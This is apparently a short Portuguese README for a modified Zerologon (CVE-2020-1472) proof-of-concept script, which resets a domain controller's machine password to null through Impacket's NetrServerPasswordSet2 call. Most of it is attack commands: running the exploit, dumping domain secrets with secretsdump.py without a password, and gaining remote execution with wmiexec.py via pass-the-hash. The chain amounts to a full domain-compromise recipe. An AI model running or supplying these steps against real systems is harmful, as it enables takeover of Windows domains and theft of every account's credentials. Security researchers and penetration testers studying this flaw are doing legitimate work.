
Modificado o PoC de teste do Secura, CVE-2020-1472, para alterar a senha da máquina para null
Modificado o PoC de teste do Secura, CVE-2020-1472, para alterar a senha da máquina para nulo. A alteração da senha na máquina utiliza a função NetrServerPasswordSet2() da Microsoft. Este exploit aproveita o módulo nrpc.py do Impacket para chamar NetrServerPasswordSet2().
./zerologon_NULLPASS.py <dc-name> <dc-ip>

secretsdump.py -no-pass <dc-name>\$@<dc-ip>

wmiexec.py -hashes <LM:NT> <username>@<ip>
